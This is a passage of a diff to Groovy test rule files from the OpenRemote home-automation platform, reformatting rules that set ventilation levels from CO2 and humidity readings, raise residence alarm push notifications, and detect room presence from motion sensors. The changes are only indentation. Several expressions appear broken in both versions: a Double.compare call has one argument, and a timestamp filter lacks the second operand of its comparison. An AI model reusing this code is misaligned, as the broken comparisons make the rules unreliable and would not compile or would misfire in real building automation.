-                    new AssetQuery().types(RoomAsset).parents(residence.id).attributeValue(attribute, GREATER_THAN, 0)
-            ).max { roomA, roomB ->
-                // get the room with the highest level
-                Double.compare(roomA.value.orElse(0))
-            }
+Closure<Boolean> roomThresholdMatch = { RulesFacts facts, AssetState residence, String attribute, boolean above, double threshold, String timeWindow ->
+  // Any room of the residence which has a level greater than zero
+  def roomWithMaxLevel = facts.matchAssetState(
+  new AssetQuery().types(RoomAsset).parents(residence.id).attributeValue(attribute, GREATER_THAN, 0)
+  ).max { roomA, roomB ->
+    // get the room with the highest level
+    Double.compare(roomA.value.orElse(0))
+  }
 
-            if (roomWithMaxLevel.isPresent()) {
-                // if we have a room with max level
-                return roomWithMaxLevel.filter { room ->
-                    // and the level is above/below threshold
-                    room.value.isPresent()
-                }.filter { roomAboveBelowThreshold ->
-                    // and no level above/below threshold in the time window
-                    facts.matchAssetEvent(
-                            new AssetQuery()
-                                    .ids(roomAboveBelowThreshold.id)
-                                    .attributeValue(attribute, above ? LESS_EQUALS : GREATER_THAN, threshold)
-                    ).filter{facts.clock.now.minus(12, ChronoUnit.MINUTES).toEpochMilli() < it.timestamp}.count() == 0
-                }.isPresent()
-            } else {
-                // if we don't have a room with max level (empty attribute?), it's always "below threshold"
-                return !above
-            }
-        }
+  if (roomWithMaxLevel.isPresent()) {
+    // if we have a room with max level
+    return roomWithMaxLevel.filter { room ->
+      // and the level is above/below threshold
+      room.value.isPresent()
+    }.filter { roomAboveBelowThreshold ->
+      // and no level above/below threshold in the time window
+      facts.matchAssetEvent(
+      new AssetQuery()
+      .ids(roomAboveBelowThreshold.id)
+      .attributeValue(attribute, above ? LESS_EQUALS : GREATER_THAN, threshold)
+      ).filter{
+        facts.clock.now.minus(12, ChronoUnit.MINUTES).toEpochMilli() <it.timestamp
+      }.count() == 0
+    }.isPresent()
+  } else {
+    // if we don't have a room with max level (empty attribute?), it's always "below threshold"
+    return !above
+  }
+}
 
 rules.add()
         .name("Auto ventilation is on, level is below MEDIUM, CO2 or humidity above MEDIUM, set level MEDIUM")
-        .when(
-        { facts ->
-            residenceWithVentilationAutoMatch(
-                    facts, LESS_THAN, VENTILATION_LEVEL_MEDIUM
-            ).filter { residence ->
-                def roomAboveThresholdCO2 = roomThresholdMatch(
-                        facts, residence, "co2Level", true, VENTILATION_THRESHOLD_MEDIUM_CO2_LEVEL, VENTILATION_THRESHOLD_MEDIUM_CO2_TIME_WINDOW
-                )
-                def roomAboveThresholdHumidity = roomThresholdMatch(
-                        facts, residence, "humidity", true, VENTILATION_THRESHOLD_MEDIUM_HUMIDITY, VENTILATION_THRESHOLD_MEDIUM_HUMIDITY_TIME_WINDOW
-                )
-                roomAboveThresholdCO2 || roomAboveThresholdHumidity
-            }.findFirst().map { residence ->
-                facts.bind("residence", residence)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          residenceWithVentilationAutoMatch(
+                  facts, LESS_THAN, VENTILATION_LEVEL_MEDIUM
+                  ).filter { residence ->
+            def roomAboveThresholdCO2 = roomThresholdMatch(
+                    facts, residence, "co2Level", true, VENTILATION_THRESHOLD_MEDIUM_CO2_LEVEL, VENTILATION_THRESHOLD_MEDIUM_CO2_TIME_WINDOW
+                    )
+            def roomAboveThresholdHumidity = roomThresholdMatch(
+                            facts, residence, "humidity", true, VENTILATION_THRESHOLD_MEDIUM_HUMIDITY, VENTILATION_THRESHOLD_MEDIUM_HUMIDITY_TIME_WINDOW
+                            )
+            roomAboveThresholdCO2 || roomAboveThresholdHumidity
+          }.findFirst().map { residence ->
+            facts.bind("residence", residence)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState residence = facts.bound("residence")
-            LOG.info("Ventilation auto and too much CO2/humidity in a room, switching to MEDIUM: " + residence.assetName)
-            facts.updateAssetState(residence.id, "ventilationLevel", VENTILATION_LEVEL_MEDIUM)
+        .then({ facts ->
+          AssetState residence = facts.bound("residence")
+          LOG.info("Ventilation auto and too much CO2/humidity in a room, switching to MEDIUM: " + residence.assetName)
+          facts.updateAssetState(residence.id, "ventilationLevel", VENTILATION_LEVEL_MEDIUM)
         })
 
 rules.add()
         .name("Auto ventilation is on, level is above LOW, CO2 or humidity below MEDIUM, set level LOW")
-        .when(
-        { facts ->
-            residenceWithVentilationAutoMatch(
-                    facts, GREATER_THAN, VENTILATION_LEVEL_LOW
-            ).filter { residence ->
-                def roomBelowThresholdCO2 = roomThresholdMatch(
-                        facts, residence, "co2Level", false, VENTILATION_THRESHOLD_MEDIUM_CO2_LEVEL, VENTILATION_THRESHOLD_MEDIUM_TIME_WINDOW
-                )
-                def roomBelowThresholdHumidity = roomThresholdMatch(
-                        facts, residence, "humidity", false, VENTILATION_THRESHOLD_MEDIUM_HUMIDITY, VENTILATION_THRESHOLD_MEDIUM_TIME_WINDOW
-                )
-                roomBelowThresholdCO2 && roomBelowThresholdHumidity
-            }.findFirst().map { residence ->
-                facts.bind("residence", residence)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          residenceWithVentilationAutoMatch(
+                  facts, GREATER_THAN, VENTILATION_LEVEL_LOW
+                  ).filter { residence ->
+            def roomBelowThresholdCO2 = roomThresholdMatch(
+                    facts, residence, "co2Level", false, VENTILATION_THRESHOLD_MEDIUM_CO2_LEVEL, VENTILATION_THRESHOLD_MEDIUM_TIME_WINDOW
+                    )
+            def roomBelowThresholdHumidity = roomThresholdMatch(
+                            facts, residence, "humidity", false, VENTILATION_THRESHOLD_MEDIUM_HUMIDITY, VENTILATION_THRESHOLD_MEDIUM_TIME_WINDOW
+                            )
+            roomBelowThresholdCO2 && roomBelowThresholdHumidity
+          }.findFirst().map { residence ->
+            facts.bind("residence", residence)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState residence = facts.bound("residence")
-            LOG.info("Ventilation auto and low CO2/humidity in all rooms, switching to LOW: " + residence.assetName)
-            facts.updateAssetState(residence.id, "ventilationLevel", VENTILATION_LEVEL_LOW)
+        .then({ facts ->
+          AssetState residence = facts.bound("residence")
+          LOG.info("Ventilation auto and low CO2/humidity in all rooms, switching to LOW: " + residence.assetName)
+          facts.updateAssetState(residence.id, "ventilationLevel", VENTILATION_LEVEL_LOW)
         })
 
 rules.add()
         .name("Auto ventilation is on, level is below HIGH, CO2 or humidity above HIGH, set level HIGH")
-        .when(
-        { facts ->
-            residenceWithVentilationAutoMatch(
-                    facts, LESS_THAN, VENTILATION_LEVEL_HIGH
-            ).filter { residence ->
-                def roomAboveThresholdCO2 = roomThresholdMatch(
-                        facts, residence, "co2Level", true, VENTILATION_THRESHOLD_HIGH_CO2_LEVEL, VENTILATION_THRESHOLD_HIGH_CO2_TIME_WINDOW
-                )
-                def roomAboveThresholdHumidity = roomThresholdMatch(
-                        facts, residence, "humidity", true, VENTILATION_THRESHOLD_HIGH_HUMIDITY, VENTILATION_THRESHOLD_HIGH_HUMIDITY_TIME_WINDOW
-                )
-                roomAboveThresholdCO2 || roomAboveThresholdHumidity
-            }.findFirst().map { residence ->
-                facts.bind("residence", residence)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          residenceWithVentilationAutoMatch(
+                  facts, LESS_THAN, VENTILATION_LEVEL_HIGH
+                  ).filter { residence ->
+            def roomAboveThresholdCO2 = roomThresholdMatch(
+                    facts, residence, "co2Level", true, VENTILATION_THRESHOLD_HIGH_CO2_LEVEL, VENTILATION_THRESHOLD_HIGH_CO2_TIME_WINDOW
+                    )
+            def roomAboveThresholdHumidity = roomThresholdMatch(
+                            facts, residence, "humidity", true, VENTILATION_THRESHOLD_HIGH_HUMIDITY, VENTILATION_THRESHOLD_HIGH_HUMIDITY_TIME_WINDOW
+                            )
+            roomAboveThresholdCO2 || roomAboveThresholdHumidity
+          }.findFirst().map { residence ->
+            facts.bind("residence", residence)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState residence = facts.bound("residence")
-            LOG.info("Ventilation auto and too much CO2/humidity in a room, switching to HIGH: " + residence.assetName)
-            facts.updateAssetState(residence.id, "ventilationLevel", VENTILATION_LEVEL_HIGH)
+        .then({ facts ->
+          AssetState residence = facts.bound("residence")
+          LOG.info("Ventilation auto and too much CO2/humidity in a room, switching to HIGH: " + residence.assetName)
+          facts.updateAssetState(residence.id, "ventilationLevel", VENTILATION_LEVEL_HIGH)
         })
 
 rules.add()
         .name("Auto ventilation is on, level is above MEDIUM, CO2 or humidity below HIGH, set level MEDIUM")
-        .when(
-        { facts ->
-            residenceWithVentilationAutoMatch(
-                    facts, GREATER_THAN, VENTILATION_LEVEL_MEDIUM
-            ).filter { residence ->
-                def roomBelowThresholdCO2 = roomThresholdMatch(
-                        facts, residence, "co2Level", false, VENTILATION_THRESHOLD_HIGH_CO2_LEVEL, VENTILATION_THRESHOLD_HIGH_TIME_WINDOW
-                )
-                def roomBelowThresholdHumidity = roomThresholdMatch(
-                        facts, residence, "humidity", false, VENTILATION_THRESHOLD_HIGH_HUMIDITY, VENTILATION_THRESHOLD_HIGH_TIME_WINDOW
-                )
-                roomBelowThresholdCO2 && roomBelowThresholdHumidity
-            }.findFirst().map { residence ->
-                facts.bind("residence", residence)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          residenceWithVentilationAutoMatch(
+                  facts, GREATER_THAN, VENTILATION_LEVEL_MEDIUM
+                  ).filter { residence ->
+            def roomBelowThresholdCO2 = roomThresholdMatch(
+                    facts, residence, "co2Level", false, VENTILATION_THRESHOLD_HIGH_CO2_LEVEL, VENTILATION_THRESHOLD_HIGH_TIME_WINDOW
+                    )
+            def roomBelowThresholdHumidity = roomThresholdMatch(
+                            facts, residence, "humidity", false, VENTILATION_THRESHOLD_HIGH_HUMIDITY, VENTILATION_THRESHOLD_HIGH_TIME_WINDOW
+                            )
+            roomBelowThresholdCO2 && roomBelowThresholdHumidity
+          }.findFirst().map { residence ->
+            facts.bind("residence", residence)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState residence = facts.bound("residence")
-            LOG.info("Ventilation auto and low CO2/humidity in all rooms, switching to MEDIUM: " + residence.assetName)
-            facts.updateAssetState(residence.id, "ventilationLevel", VENTILATION_LEVEL_MEDIUM)
+        .then({ facts ->
+          AssetState residence = facts.bound("residence")
+          LOG.info("Ventilation auto and low CO2/humidity in all rooms, switching to MEDIUM: " + residence.assetName)
+          facts.updateAssetState(residence.id, "ventilationLevel", VENTILATION_LEVEL_MEDIUM)
         })

--- a/test/src/test/resources/org/openremote/test/rules/ResidenceNotifyAlarmTrigger.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/ResidenceNotifyAlarmTrigger.groovy
@@ -42,8 +42,8 @@ Notifications notifications = binding.notifications
 
 @ToString(includeNames = true)
 class AlarmTrigger {
-    String residenceId
-    String roomName
+  String residenceId
+  String roomName
 }
 
 /**
@@ -51,167 +51,159 @@ class AlarmTrigger {
  */
 @ToString(includeNames = true)
 class AlertSilence {
-    static String DURATION = "PT30M"
-    String residenceId
+  static String DURATION = "PT30M"
+  String residenceId
 }
 
 rules.add()
         .name("Create alarm trigger when residence alarm is enabled and presence is detected in any room")
-        .when(
-        { facts ->
-            facts.matchAssetState(
-                    new AssetQuery().types(BuildingAsset).attributeValue("alarmEnabled", true)
-            ).filter { residenceWithAlarmEnabled ->
-                !facts.matchFirst(AlarmTrigger) { alarmTrigger ->
-                    alarmTrigger.residenceId == residenceWithAlarmEnabled.id
-                }.isPresent()
-            }.map { residenceWithoutAlarmTrigger ->
-                // Map to Optional<AssetState<?>> of the "first" room in the residence with presence detected
-                facts.matchFirstAssetState(
-                        new AssetQuery().types(RoomAsset)
-                                .parents(residenceWithoutAlarmTrigger.id)
-                                .attributeValue("presenceDetected", true)
-                )
-            }.filter {
-                it.isPresent()
-            }.map {
-                it.get()
-            }.findFirst().map { roomWithPresence ->
-                facts.bind("residenceId", roomWithPresence.parentId)
-                        .bind("roomName", roomWithPresence.assetName)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          facts.matchAssetState(
+                  new AssetQuery().types(BuildingAsset).attributeValue("alarmEnabled", true)
+                  ).filter { residenceWithAlarmEnabled ->
+            !facts.matchFirst(AlarmTrigger) { alarmTrigger ->
+              alarmTrigger.residenceId == residenceWithAlarmEnabled.id
+            }.isPresent()
+          }.map { residenceWithoutAlarmTrigger ->
+            // Map to Optional<AssetState<?>> of the "first" room in the residence with presence detected
+            facts.matchFirstAssetState(
+                    new AssetQuery().types(RoomAsset)
+                    .parents(residenceWithoutAlarmTrigger.id)
+                    .attributeValue("presenceDetected", true)
+                    )
+          }.filter {
+            it.isPresent()
+          }.map {
+            it.get()
+          }.findFirst().map { roomWithPresence ->
+            facts.bind("residenceId", roomWithPresence.parentId)
+            .bind("roomName", roomWithPresence.assetName)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AlarmTrigger alarmTrigger = new AlarmTrigger(
-                    residenceId: facts.bound("residenceId"),
-                    roomName: facts.bound("roomName")
-            )
-            LOG.info("Alarm enabled and presence detected in residence, creating: $alarmTrigger")
-            facts.put(alarmTrigger)
+        .then({ facts ->
+          AlarmTrigger alarmTrigger = new AlarmTrigger(
+                  residenceId: facts.bound("residenceId"),
+                  roomName: facts.bound("roomName")
+                  )
+          LOG.info("Alarm enabled and presence detected in residence, creating: $alarmTrigger")
+          facts.put(alarmTrigger)
         })
 
 rules.add()
         .name("Remove alarm trigger when no presence is detected in any room of residence")
-        .when(
-        { facts ->
-            facts.matchFirst(AlarmTrigger) { alarmTrigger ->
-                !facts.matchFirstAssetState(
-                        new AssetQuery().types(RoomAsset)
-                                .parents(alarmTrigger.residenceId)
-                                .attributeValue("presenceDetected", true)
-                ).isPresent()
-            }.map { alarmTrigger ->
-                facts.bind("alarmTrigger", alarmTrigger)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          facts.matchFirst(AlarmTrigger) { alarmTrigger ->
+            !facts.matchFirstAssetState(
+                    new AssetQuery().types(RoomAsset)
+                    .parents(alarmTrigger.residenceId)
+                    .attributeValue("presenceDetected", true)
+                    ).isPresent()
+          }.map { alarmTrigger ->
+            facts.bind("alarmTrigger", alarmTrigger)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AlarmTrigger alarmTrigger = facts.bound("alarmTrigger")
-            LOG.info("No presence in any room, removing: " + alarmTrigger)
-            facts.remove(alarmTrigger)
+        .then({ facts ->
+          AlarmTrigger alarmTrigger = facts.bound("alarmTrigger")
+          LOG.info("No presence in any room, removing: " + alarmTrigger)
+          facts.remove(alarmTrigger)
         })
 
 rules.add()
         .name("Remove alarm trigger when residence alarm is disabled")
-        .when(
-        { facts ->
-            facts.matchFirst(AlarmTrigger) { alarmTrigger ->
-                facts.matchFirstAssetState(
-                        new AssetQuery().types(BuildingAsset)
-                                .ids(alarmTrigger.residenceId)
-                                .attributeValue("alarmEnabled", false)
-                ).isPresent()
-            }.map { alarmTrigger ->
-                facts.bind("alarmTrigger", alarmTrigger)
-                true
-            }.orElse(false)
-        }).then(
-        { facts ->
-            AlarmTrigger alarmTrigger = facts.bound("alarmTrigger")
-            LOG.info("Alarm disabled, removing: " + alarmTrigger)
-            facts.remove(alarmTrigger)
+        .when({ facts ->
+          facts.matchFirst(AlarmTrigger) { alarmTrigger ->
+            facts.matchFirstAssetState(
+                    new AssetQuery().types(BuildingAsset)
+                    .ids(alarmTrigger.residenceId)
+                    .attributeValue("alarmEnabled", false)
+                    ).isPresent()
+          }.map { alarmTrigger ->
+            facts.bind("alarmTrigger", alarmTrigger)
+            true
+          }.orElse(false)
+        }).then({ facts ->
+          AlarmTrigger alarmTrigger = facts.bound("alarmTrigger")
+          LOG.info("Alarm disabled, removing: " + alarmTrigger)
+          facts.remove(alarmTrigger)
         })
 
 rules.add()
         .name("Alert user when alarm has been triggered and not done so already")
-        .when(
-        { facts ->
-            facts.matchAssetState(
-                    new AssetQuery().types(BuildingAsset).attributeValue("alarmEnabled", true)
-            ).map { residenceWithAlarmEnabled ->
-                facts.matchFirst(AlarmTrigger, { alarmTrigger ->
-                    alarmTrigger.residenceId == residenceWithAlarmEnabled.id
-                })
-            }.filter { alarmTrigger ->
-                // there is an alarm trigger and alerts are not silenced for this residence
-                alarmTrigger.isPresent() &&
-                        !facts.matchFirst(AlertSilence, { alertSilence ->
-                            alertSilence.residenceId == alarmTrigger.get().residenceId
-                        }).isPresent()
-            }.map {
-                it.get()
-            }.findFirst().map { alarmTrigger ->
-                facts.bind("alarmTrigger", alarmTrigger)
-                true
-            }.orElse(false)
-        }).then(
-        { facts ->
-            AlarmTrigger alarmTrigger = facts.bound("alarmTrigger")
+        .when({ facts ->
+          facts.matchAssetState(
+                  new AssetQuery().types(BuildingAsset).attributeValue("alarmEnabled", true)
+                  ).map { residenceWithAlarmEnabled ->
+            facts.matchFirst(AlarmTrigger, { alarmTrigger ->
+              alarmTrigger.residenceId == residenceWithAlarmEnabled.id
+            })
+          }.filter { alarmTrigger ->
+            // there is an alarm trigger and alerts are not silenced for this residence
+            alarmTrigger.isPresent() &&
+            !facts.matchFirst(AlertSilence, { alertSilence ->
+              alertSilence.residenceId == alarmTrigger.get().residenceId
+            }).isPresent()
+          }.map {
+            it.get()
+          }.findFirst().map { alarmTrigger ->
+            facts.bind("alarmTrigger", alarmTrigger)
+            true
+          }.orElse(false)
+        }).then({ facts ->
+          AlarmTrigger alarmTrigger = facts.bound("alarmTrigger")
 
-            // Get users linked to this residence
-            UserQuery query = new UserQuery()
-                    .assets(alarmTrigger.residenceId)
+          // Get users linked to this residence
+          UserQuery query = new UserQuery()
+                  .assets(alarmTrigger.residenceId)
 
-            Collection<String> userIds = users.getResults(query).collect(Collectors.toList())
+          Collection<String> userIds = users.getResults(query).collect(Collectors.toList())
 
-            LOG.info("Alerting users of " + alarmTrigger + ": " + userIds)
+          LOG.info("Alerting users of " + alarmTrigger + ": " + userIds)
 
-            List<Notification.Target> targets = userIds.stream().map{new Notification.Target(Notification.TargetType.USER, it)}.collect(Collectors.toList())
-            Notification notification = new Notification(
-                    "ApartmentAlarm",
-                    new PushNotificationMessage()
-                            .setTitle("Apartment Alarm")
-                            .setBody("Aanwezigheid in " + alarmTrigger.roomName + " (" + facts.clock.now + ").")
-                            .setButtons([
+          List<Notification.Target> targets = userIds.stream().map{
+            new Notification.Target(Notification.TargetType.USER, it)
+          }.collect(Collectors.toList())
+          Notification notification = new Notification(
+                          "ApartmentAlarm",
+                          new PushNotificationMessage()
+                          .setTitle("Apartment Alarm")
+                          .setBody("Aanwezigheid in " + alarmTrigger.roomName + " (" + facts.clock.now + ").")
+                          .setButtons([
                             new PushNotificationButton("Details", new PushNotificationAction("#security")),
                             new PushNotificationButton("Alarm uit", PushNotificationAction.writeAttributeValueAction(new AttributeRef(alarmTrigger.residenceId, "alarmEnabled"), false))
-                    ]),
-                    targets, null, null
-            )
+                          ]),
+                          targets, null, null
+                          )
 
-            // Send the notification to all matched users
-            notifications.send(notification)
+          // Send the notification to all matched users
+          notifications.send(notification)
 
-            AlertSilence alertSilence = new AlertSilence(
-                    residenceId: alarmTrigger.residenceId
-            )
-            facts.putTemporary(AlertSilence.DURATION, alertSilence)
+          AlertSilence alertSilence = new AlertSilence(
+                          residenceId: alarmTrigger.residenceId
+                          )
+          facts.putTemporary(AlertSilence.DURATION, alertSilence)
         })
 
 rules.add()
         .name("Remove alert silence when residence alarm is disabled")
-        .when(
-        { facts ->
-            facts.matchAssetState(
-                    new AssetQuery().types(BuildingAsset).attributeValue("alarmEnabled", false)
-            ).map { residenceWithAlarmEnabled ->
-                facts.matchFirst(AlertSilence) { alertSilence ->
-                    alertSilence.residenceId == residenceWithAlarmEnabled.id
-                }
-            }.filter {
-                it.isPresent()
-            }.map {
-                it.get()
-            }.findFirst().map { alertSilence ->
-                facts.bind("alertSilence", alertSilence)
-                true
-            }.orElse(false)
-        }).then(
-        { facts ->
-            AlertSilence alertSilence = facts.bound("alertSilence")
-            LOG.info("Alarm disabled, removing: " + alertSilence)
-            facts.remove(alertSilence)
+        .when({ facts ->
+          facts.matchAssetState(
+                  new AssetQuery().types(BuildingAsset).attributeValue("alarmEnabled", false)
+                  ).map { residenceWithAlarmEnabled ->
+            facts.matchFirst(AlertSilence) { alertSilence ->
+              alertSilence.residenceId == residenceWithAlarmEnabled.id
+            }
+          }.filter {
+            it.isPresent()
+          }.map {
+            it.get()
+          }.findFirst().map { alertSilence ->
+            facts.bind("alertSilence", alertSilence)
+            true
+          }.orElse(false)
+        }).then({ facts ->
+          AlertSilence alertSilence = facts.bound("alertSilence")
+          LOG.info("Alarm disabled, removing: " + alertSilence)
+          facts.remove(alertSilence)
         })

--- a/test/src/test/resources/org/openremote/test/rules/ResidencePresenceDetection.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/ResidencePresenceDetection.groovy
@@ -17,14 +17,14 @@
  * SPDX-License-Identifier: AGPL-3.0-or-later
  */
 /*
-Uses 'motionSensor' and optional 'co2Level' of a room asset to set the 'presenceDetected'
-and 'lastPresenceDetected' attributes of the room. Presence detection is based on motion
-sensing and if available for a room, increasing CO2 level over a time window. The assumption
-is that the 'motionSensor' is set to 0 or 1, depending on whether motion has been detected
-in a room over a time window that is internal to the sensor (e.g. the last minute). The
-'presenceDetected' attribute of the residence is set depending on whether any child room
-assets have presence set.
-*/
+ Uses 'motionSensor' and optional 'co2Level' of a room asset to set the 'presenceDetected'
+ and 'lastPresenceDetected' attributes of the room. Presence detection is based on motion
+ sensing and if available for a room, increasing CO2 level over a time window. The assumption
+ is that the 'motionSensor' is set to 0 or 1, depending on whether motion has been detected
+ in a room over a time window that is internal to the sensor (e.g. the last minute). The
+ 'presenceDetected' attribute of the residence is set depending on whether any child room
+ assets have presence set.
+ */
 package org.openremote.setup.integration.rules
 
 import org.openremote.manager.rules.RulesBuilder
@@ -46,175 +46,164 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("Set presence detected flag of room when motion is detected and (optional) CO2 increased")
-        .when(
-        { facts ->
-            // Any room where the presence detected flag is not set
+        .when({ facts ->
+          // Any room where the presence detected flag is not set
+          facts.matchAssetState(
+                  new AssetQuery().types(RoomAsset).attributeValue("presenceDetected", false)
+                  ).flatMap { roomWithoutPresence ->
+            // and the motion sensor has been triggered
             facts.matchAssetState(
-                    new AssetQuery().types(RoomAsset).attributeValue("presenceDetected", false)
-            ).flatMap { roomWithoutPresence ->
-                // and the motion sensor has been triggered
-                facts.matchAssetState(
-                        new AssetQuery().ids(roomWithoutPresence.id).attributeValue("motionSensor", GREATER_THAN, 0)
-                )
-            }.findFirst().map { roomWithMotionSensorTriggered ->
+                    new AssetQuery().ids(roomWithoutPresence.id).attributeValue("motionSensor", GREATER_THAN, 0)
+                    )
+          }.findFirst().map { roomWithMotionSensorTriggered ->
 
-                facts.bind("room", roomWithMotionSensorTriggered)
-                true
+            facts.bind("room", roomWithMotionSensorTriggered)
+            true
 
-                /* Results in many false negatives when somebody is moving in the room but
-                   windows are open, and therefore CO2 is not increasing
-
-                // and there is a CO2 sensor in the room
-                facts.matchFirstAssetState(
-                        new AssetQuery().id(roomWithMotionSensorTriggered.id).attributeName("co2Level")
-                ).map({ co2Level ->
-                    // and there are sensor events
-                    facts.matchAssetEvent(
-                            new AssetQuery().id(roomWithMotionSensorTriggered.id).attributeName("co2Level")
-                    ).filter(
-                            // in the last 12 minutes
-                            facts.clock.last("12m")
-                    ).map({ co2LevelFact ->
-                        co2LevelFact.fact
-                    }
-                    ).filter({ coLevel ->
-                        // with increasing values
-                        coLevel.isValueGreaterThanOldValue()
-                    }).count() >= 2 // at least 2
-                }).orElse(true) // or we don't have a CO2 sensor
-                */
-
-            }.orElse(false)
+            /* Results in many false negatives when somebody is moving in the room but
+     windows are open, and therefore CO2 is not increasing
+     // and there is a CO2 sensor in the room
+     facts.matchFirstAssetState(
+     new AssetQuery().id(roomWithMotionSensorTriggered.id).attributeName("co2Level")
+     ).map({ co2Level ->
+     // and there are sensor events
+     facts.matchAssetEvent(
+     new AssetQuery().id(roomWithMotionSensorTriggered.id).attributeName("co2Level")
+     ).filter(
+     // in the last 12 minutes
+     facts.clock.last("12m")
+     ).map({ co2LevelFact ->
+     co2LevelFact.fact
+     }
+     ).filter({ coLevel ->
+     // with increasing values
+     coLevel.isValueGreaterThanOldValue()
+     }).count() >= 2 // at least 2
+     }).orElse(true) // or we don't have a CO2 sensor
+     */
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState room = facts.bound("room")
-            LOG.info("Presence detected in room: " + room.assetName + " [" + room.id + "]")
-            facts.updateAssetState(room.id, "presenceDetected", true)
+        .then({ facts ->
+          AssetState room = facts.bound("room")
+          LOG.info("Presence detected in room: " + room.assetName + " [" + room.id + "]")
+          facts.updateAssetState(room.id, "presenceDetected", true)
         })
 
 rules.add()
         .name("Clear presence detected flag of room if no motion is detected and (optional) CO2 did not increase")
-        .when(
-        { facts ->
-            // Any room where the presence detected flag is set
+        .when({ facts ->
+          // Any room where the presence detected flag is set
+          facts.matchAssetState(
+                  new AssetQuery().types(RoomAsset).attributeValue("presenceDetected", true)
+                  ).flatMap { roomWithPresence ->
+            // and the motion sensor has not been triggered
             facts.matchAssetState(
-                    new AssetQuery().types(RoomAsset).attributeValue("presenceDetected", true)
-            ).flatMap { roomWithPresence ->
-                // and the motion sensor has not been triggered
-                facts.matchAssetState(
-                        new AssetQuery().ids(roomWithPresence.id).attributeValue("motionSensor", LESS_THAN, 1)
-                )
-            }.findFirst().map { roomWithoutMotionSensorTriggered ->
+                    new AssetQuery().ids(roomWithPresence.id).attributeValue("motionSensor", LESS_THAN, 1)
+                    )
+          }.findFirst().map { roomWithoutMotionSensorTriggered ->
 
-                facts.bind("room", roomWithoutMotionSensorTriggered)
+            facts.bind("room", roomWithoutMotionSensorTriggered)
 
-                // and there is a CO2 sensor in the room
-                facts.matchFirstAssetState(
-                        new AssetQuery().ids(roomWithoutMotionSensorTriggered.id).attributeName("co2Level")
-                ).map { co2Level ->
-                    // and there are no sensor events
-                    facts.matchAssetEvent(
+            // and there is a CO2 sensor in the room
+            facts.matchFirstAssetState(
                             new AssetQuery().ids(roomWithoutMotionSensorTriggered.id).attributeName("co2Level")
-                    ).filter { coLevelFact ->
+                            ).map { co2Level ->
+                      // and there are no sensor events
+                      facts.matchAssetEvent(
+                              new AssetQuery().ids(roomWithoutMotionSensorTriggered.id).attributeName("co2Level")
+                              ).filter { coLevelFact ->
                         // with increasing values
                         coLevelFact.getFact().isValueGreaterThanOldValue()
                         // in the last 12 minutes
-                    }.filter{facts.clock.now.minus(12, ChronoUnit.MINUTES).toEpochMilli() < it.timestamp}.count() == 0
-                }.orElse(true) // or we don't have a CO2 sensor
-
-            }.orElse(false)
+                      }.filter{
+                        facts.clock.now.minus(12, ChronoUnit.MINUTES).toEpochMilli() <it.timestamp
+                      }.count() == 0
+                    }.orElse(true) // or we don't have a CO2 sensor
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState room = facts.bound("room")
-            LOG.info("Presence gone in residence room: " + room.assetName + " [" + room.id + "]")
-            facts.updateAssetState(room.id, "presenceDetected", false)
+        .then({ facts ->
+          AssetState room = facts.bound("room")
+          LOG.info("Presence gone in residence room: " + room.assetName + " [" + room.id + "]")
+          facts.updateAssetState(room.id, "presenceDetected", false)
         })
 
 rules.add()
         .name("Update presence detected timestamp of room with last trigger of motion sensor")
-        .when(
-        { facts ->
-            // Any room where the presence detected flag is set
+        .when({ facts ->
+          // Any room where the presence detected flag is set
+          facts.matchAssetState(
+                  new AssetQuery().types(RoomAsset).attributeValue("presenceDetected", true)
+                  ).flatMap { roomWithPresence ->
+            // and the motion sensor has been triggered
             facts.matchAssetState(
-                    new AssetQuery().types(RoomAsset).attributeValue("presenceDetected", true)
-            ).flatMap { roomWithPresence ->
-                // and the motion sensor has been triggered
-                facts.matchAssetState(
-                        new AssetQuery().ids(roomWithPresence.id)
-                                .attributeValue("motionSensor", GREATER_THAN, 0)
-                ).flatMap { roomWithMotionSensorTriggered ->
-                    // and the last presence detection timestamp is not set or is older than the motion sensor timestamp
-                    facts.matchAssetState(
-                            new AssetQuery().ids(roomWithMotionSensorTriggered.id)
-                                    .attributeName("lastPresenceDetected")
-                    ).filter({
-                        !it.value.isPresent() || it.value.timestamp
-                    }).map { outdatedLastPresenceDetected ->
-                        // keep the room and the new timestamp
-                        new Pair<AttributeInfo, Double>(outdatedLastPresenceDetected, roomWithMotionSensorTriggered.timestamp)
-                    }
-                }
-            }.findFirst().map { pair ->
-                facts.bind("room", pair.key).bind("lastPresenceTimestamp", pair.value)
-                true
-            }.orElse(false)
+                    new AssetQuery().ids(roomWithPresence.id)
+                    .attributeValue("motionSensor", GREATER_THAN, 0)
+                    ).flatMap { roomWithMotionSensorTriggered ->
+              // and the last presence detection timestamp is not set or is older than the motion sensor timestamp
+              facts.matchAssetState(
+                      new AssetQuery().ids(roomWithMotionSensorTriggered.id)
+                      .attributeName("lastPresenceDetected")
+                      ).filter({
+                !it.value.isPresent() || it.value.timestamp
+              }).map { outdatedLastPresenceDetected ->
+                // keep the room and the new timestamp
+                new Pair<AttributeInfo, Double>(outdatedLastPresenceDetected, roomWithMotionSensorTriggered.timestamp)
+              }
+            }
+          }.findFirst().map { pair ->
+            facts.bind("room", pair.key).bind("lastPresenceTimestamp", pair.value)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState room = facts.bound("room")
-            LOG.info("Motion sensor triggered, updating last presence in residence room: " + room.assetName + " [" + room.id + "]")
-            facts.updateAssetState(room.id, "lastPresenceDetected", facts.bound("lastPresenceTimestamp") as Double)
+        .then({ facts ->
+          AssetState room = facts.bound("room")
